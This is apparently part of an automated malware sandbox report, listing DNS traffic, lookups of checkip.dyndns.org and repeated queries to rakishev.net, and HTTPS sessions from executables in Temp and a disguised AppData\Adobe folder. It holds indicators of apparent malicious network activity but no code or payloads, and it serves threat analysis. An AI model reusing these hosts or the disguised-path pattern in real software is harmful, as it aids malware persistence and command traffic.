Oct 3, 2023 22:34:58.160146952 CEST	64214	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:34:58.260162115 CEST	53	64214	8.8.8.8	192.168.2.4
Oct 3, 2023 22:34:58.268608093 CEST	61749	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:34:58.369107008 CEST	53	61749	8.8.8.8	192.168.2.4
Oct 3, 2023 22:34:59.709698915 CEST	51232	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:09.546108007 CEST	54747	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:09.647445917 CEST	53	54747	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:14.182463884 CEST	52058	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:14.288537025 CEST	53	52058	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:15.270507097 CEST	54265	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:15.377439976 CEST	53	54265	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:16.318133116 CEST	52884	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:16.424501896 CEST	53	52884	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:17.842104912 CEST	50174	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:17.950346947 CEST	53	50174	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:27.693922043 CEST	59209	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:27.796555042 CEST	53	59209	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:27.805026054 CEST	60048	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:27.908480883 CEST	53	60048	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:35.553985119 CEST	49753	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:35.657469034 CEST	53	49753	8.8.8.8	192.168.2.4
Oct 3, 2023 22:35:35.666769981 CEST	63696	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:35:35.767451048 CEST	53	63696	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:16.318187952 CEST	65245	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:16.429106951 CEST	53	65245	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:21.841985941 CEST	54152	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:21.950891972 CEST	53	54152	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:33.529244900 CEST	52963	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:33.641129017 CEST	53	52963	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:34.556220055 CEST	64566	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:34.661802053 CEST	53	64566	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:35.580468893 CEST	64527	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:35.691040039 CEST	53	64527	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:36.810518980 CEST	65146	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:36.924036026 CEST	53	65146	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:46.746423006 CEST	53973	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:46.858233929 CEST	53	53973	8.8.8.8	192.168.2.4
Oct 3, 2023 22:36:58.143785000 CEST	65197	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:36:58.250010967 CEST	53	65197	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:33.299810886 CEST	50600	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:33.400536060 CEST	53	50600	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:33.427625895 CEST	61168	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:33.554940939 CEST	53	61168	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:35.583106995 CEST	57446	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:35.697448969 CEST	53	57446	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:35.704679966 CEST	62339	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:35.807406902 CEST	53	62339	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:41.267761946 CEST	55718	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:41.374496937 CEST	53	55718	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:43.235836029 CEST	55324	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:43.341514111 CEST	53	55324	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:56.630855083 CEST	54997	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:56.736481905 CEST	53	54997	8.8.8.8	192.168.2.4
Oct 3, 2023 22:37:58.007766962 CEST	64374	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:37:58.117491961 CEST	53	64374	8.8.8.8	192.168.2.4
Oct 3, 2023 22:38:09.901417017 CEST	55324	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:38:10.011219025 CEST	53	55324	8.8.8.8	192.168.2.4
Oct 3, 2023 22:38:38.671915054 CEST	59204	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:38:38.778753042 CEST	53	59204	8.8.8.8	192.168.2.4
Oct 3, 2023 22:38:39.738533020 CEST	61869	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:38:39.845357895 CEST	53	61869	8.8.8.8	192.168.2.4
Oct 3, 2023 22:38:51.390125990 CEST	63204	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:38:51.496490955 CEST	53	63204	8.8.8.8	192.168.2.4
Oct 3, 2023 22:39:00.390623093 CEST	58633	53	192.168.2.4	8.8.8.8
Oct 3, 2023 22:39:00.501626015 CEST	53	58633	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2023 22:34:57.618849039 CEST	192.168.2.4	8.8.8.8	0xb905	Standard query (0)	download.wireguard.com	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.160146952 CEST	192.168.2.4	8.8.8.8	0xe1e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.268608093 CEST	192.168.2.4	8.8.8.8	0xba7c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:59.709698915 CEST	192.168.2.4	8.8.8.8	0x34d7	Standard query (0)	ocsp.entrust.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:09.546108007 CEST	192.168.2.4	8.8.8.8	0x7609	Standard query (0)	download.wireguard.com	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:14.182463884 CEST	192.168.2.4	8.8.8.8	0x271	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:15.270507097 CEST	192.168.2.4	8.8.8.8	0x53d9	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:16.318133116 CEST	192.168.2.4	8.8.8.8	0x97b5	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:17.842104912 CEST	192.168.2.4	8.8.8.8	0x8872	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.693922043 CEST	192.168.2.4	8.8.8.8	0xb533	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.805026054 CEST	192.168.2.4	8.8.8.8	0x843b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.553985119 CEST	192.168.2.4	8.8.8.8	0x9bd1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.666769981 CEST	192.168.2.4	8.8.8.8	0xb99c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:16.318187952 CEST	192.168.2.4	8.8.8.8	0x8fb4	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:21.841985941 CEST	192.168.2.4	8.8.8.8	0x6b8a	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:33.529244900 CEST	192.168.2.4	8.8.8.8	0xedf1	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:34.556220055 CEST	192.168.2.4	8.8.8.8	0x582a	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:35.580468893 CEST	192.168.2.4	8.8.8.8	0xa17a	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:36.810518980 CEST	192.168.2.4	8.8.8.8	0xab05	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:46.746423006 CEST	192.168.2.4	8.8.8.8	0x8e12	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:58.143785000 CEST	192.168.2.4	8.8.8.8	0xfb33	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:33.299810886 CEST	192.168.2.4	8.8.8.8	0xe710	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:33.427625895 CEST	192.168.2.4	8.8.8.8	0x981e	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:35.583106995 CEST	192.168.2.4	8.8.8.8	0x29be	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:35.704679966 CEST	192.168.2.4	8.8.8.8	0xb4c6	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:41.267761946 CEST	192.168.2.4	8.8.8.8	0x9c16	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:43.235836029 CEST	192.168.2.4	8.8.8.8	0xee7d	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:56.630855083 CEST	192.168.2.4	8.8.8.8	0x91af	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:58.007766962 CEST	192.168.2.4	8.8.8.8	0x4e8f	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:09.901417017 CEST	192.168.2.4	8.8.8.8	0xd98b	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:38.671915054 CEST	192.168.2.4	8.8.8.8	0xb30	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:39.738533020 CEST	192.168.2.4	8.8.8.8	0x5303	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:51.390125990 CEST	192.168.2.4	8.8.8.8	0x37a6	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:39:00.390623093 CEST	192.168.2.4	8.8.8.8	0x2f26	Standard query (0)	rakishev.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2023 22:34:57.719342947 CEST	8.8.8.8	192.168.2.4	0xb905	No error (0)	download.wireguard.com	wireguard.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:34:57.719342947 CEST	8.8.8.8	192.168.2.4	0xb905	No error (0)	wireguard.com		136.144.57.121	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.260162115 CEST	8.8.8.8	192.168.2.4	0xe1e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:34:58.260162115 CEST	8.8.8.8	192.168.2.4	0xe1e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.260162115 CEST	8.8.8.8	192.168.2.4	0xe1e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.260162115 CEST	8.8.8.8	192.168.2.4	0xe1e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.260162115 CEST	8.8.8.8	192.168.2.4	0xe1e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.260162115 CEST	8.8.8.8	192.168.2.4	0xe1e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.369107008 CEST	8.8.8.8	192.168.2.4	0xba7c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:34:58.369107008 CEST	8.8.8.8	192.168.2.4	0xba7c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.369107008 CEST	8.8.8.8	192.168.2.4	0xba7c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.369107008 CEST	8.8.8.8	192.168.2.4	0xba7c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.369107008 CEST	8.8.8.8	192.168.2.4	0xba7c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:58.369107008 CEST	8.8.8.8	192.168.2.4	0xba7c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:34:59.821506023 CEST	8.8.8.8	192.168.2.4	0x34d7	No error (0)	ocsp.entrust.net	ocsp.entrust.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:35:09.647445917 CEST	8.8.8.8	192.168.2.4	0x7609	No error (0)	download.wireguard.com	wireguard.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:35:09.647445917 CEST	8.8.8.8	192.168.2.4	0x7609	No error (0)	wireguard.com		136.144.57.121	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:14.288537025 CEST	8.8.8.8	192.168.2.4	0x271	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:14.288537025 CEST	8.8.8.8	192.168.2.4	0x271	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:15.377439976 CEST	8.8.8.8	192.168.2.4	0x53d9	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:15.377439976 CEST	8.8.8.8	192.168.2.4	0x53d9	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:16.424501896 CEST	8.8.8.8	192.168.2.4	0x97b5	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:16.424501896 CEST	8.8.8.8	192.168.2.4	0x97b5	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:17.950346947 CEST	8.8.8.8	192.168.2.4	0x8872	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:17.950346947 CEST	8.8.8.8	192.168.2.4	0x8872	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.796555042 CEST	8.8.8.8	192.168.2.4	0xb533	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:35:27.796555042 CEST	8.8.8.8	192.168.2.4	0xb533	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.796555042 CEST	8.8.8.8	192.168.2.4	0xb533	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.796555042 CEST	8.8.8.8	192.168.2.4	0xb533	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.796555042 CEST	8.8.8.8	192.168.2.4	0xb533	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.796555042 CEST	8.8.8.8	192.168.2.4	0xb533	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.908480883 CEST	8.8.8.8	192.168.2.4	0x843b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:35:27.908480883 CEST	8.8.8.8	192.168.2.4	0x843b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.908480883 CEST	8.8.8.8	192.168.2.4	0x843b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.908480883 CEST	8.8.8.8	192.168.2.4	0x843b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.908480883 CEST	8.8.8.8	192.168.2.4	0x843b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:27.908480883 CEST	8.8.8.8	192.168.2.4	0x843b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.657469034 CEST	8.8.8.8	192.168.2.4	0x9bd1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:35:35.657469034 CEST	8.8.8.8	192.168.2.4	0x9bd1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.657469034 CEST	8.8.8.8	192.168.2.4	0x9bd1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.657469034 CEST	8.8.8.8	192.168.2.4	0x9bd1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.657469034 CEST	8.8.8.8	192.168.2.4	0x9bd1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.657469034 CEST	8.8.8.8	192.168.2.4	0x9bd1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.767451048 CEST	8.8.8.8	192.168.2.4	0xb99c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2023 22:35:35.767451048 CEST	8.8.8.8	192.168.2.4	0xb99c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.767451048 CEST	8.8.8.8	192.168.2.4	0xb99c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.767451048 CEST	8.8.8.8	192.168.2.4	0xb99c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.767451048 CEST	8.8.8.8	192.168.2.4	0xb99c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:35:35.767451048 CEST	8.8.8.8	192.168.2.4	0xb99c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:16.429106951 CEST	8.8.8.8	192.168.2.4	0x8fb4	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:16.429106951 CEST	8.8.8.8	192.168.2.4	0x8fb4	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:21.950891972 CEST	8.8.8.8	192.168.2.4	0x6b8a	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:21.950891972 CEST	8.8.8.8	192.168.2.4	0x6b8a	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:33.641129017 CEST	8.8.8.8	192.168.2.4	0xedf1	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:33.641129017 CEST	8.8.8.8	192.168.2.4	0xedf1	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:34.661802053 CEST	8.8.8.8	192.168.2.4	0x582a	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:34.661802053 CEST	8.8.8.8	192.168.2.4	0x582a	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:35.691040039 CEST	8.8.8.8	192.168.2.4	0xa17a	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:35.691040039 CEST	8.8.8.8	192.168.2.4	0xa17a	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:36.924036026 CEST	8.8.8.8	192.168.2.4	0xab05	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:36.924036026 CEST	8.8.8.8	192.168.2.4	0xab05	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:46.858233929 CEST	8.8.8.8	192.168.2.4	0x8e12	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:46.858233929 CEST	8.8.8.8	192.168.2.4	0x8e12	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:58.250010967 CEST	8.8.8.8	192.168.2.4	0xfb33	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:36:58.250010967 CEST	8.8.8.8	192.168.2.4	0xfb33	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:33.400536060 CEST	8.8.8.8	192.168.2.4	0xe710	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:33.400536060 CEST	8.8.8.8	192.168.2.4	0xe710	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:33.554940939 CEST	8.8.8.8	192.168.2.4	0x981e	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:33.554940939 CEST	8.8.8.8	192.168.2.4	0x981e	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:35.697448969 CEST	8.8.8.8	192.168.2.4	0x29be	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:35.697448969 CEST	8.8.8.8	192.168.2.4	0x29be	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:35.807406902 CEST	8.8.8.8	192.168.2.4	0xb4c6	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:35.807406902 CEST	8.8.8.8	192.168.2.4	0xb4c6	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:41.374496937 CEST	8.8.8.8	192.168.2.4	0x9c16	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:41.374496937 CEST	8.8.8.8	192.168.2.4	0x9c16	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:43.341514111 CEST	8.8.8.8	192.168.2.4	0xee7d	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:43.341514111 CEST	8.8.8.8	192.168.2.4	0xee7d	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:56.736481905 CEST	8.8.8.8	192.168.2.4	0x91af	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:56.736481905 CEST	8.8.8.8	192.168.2.4	0x91af	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:58.117491961 CEST	8.8.8.8	192.168.2.4	0x4e8f	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:37:58.117491961 CEST	8.8.8.8	192.168.2.4	0x4e8f	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:10.011219025 CEST	8.8.8.8	192.168.2.4	0xd98b	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:10.011219025 CEST	8.8.8.8	192.168.2.4	0xd98b	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:38.778753042 CEST	8.8.8.8	192.168.2.4	0xb30	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:38.778753042 CEST	8.8.8.8	192.168.2.4	0xb30	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:39.845357895 CEST	8.8.8.8	192.168.2.4	0x5303	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:39.845357895 CEST	8.8.8.8	192.168.2.4	0x5303	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:51.496490955 CEST	8.8.8.8	192.168.2.4	0x37a6	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:38:51.496490955 CEST	8.8.8.8	192.168.2.4	0x37a6	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:39:00.501626015 CEST	8.8.8.8	192.168.2.4	0x2f26	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 3, 2023 22:39:00.501626015 CEST	8.8.8.8	192.168.2.4	0x2f26	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

download.wireguard.com

rakishev.net

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49775	136.144.57.121	443	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49776	136.144.57.121	443	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49832	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49834	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49833	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49853	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49854	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49855	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49856	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49866	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49867	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49868	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

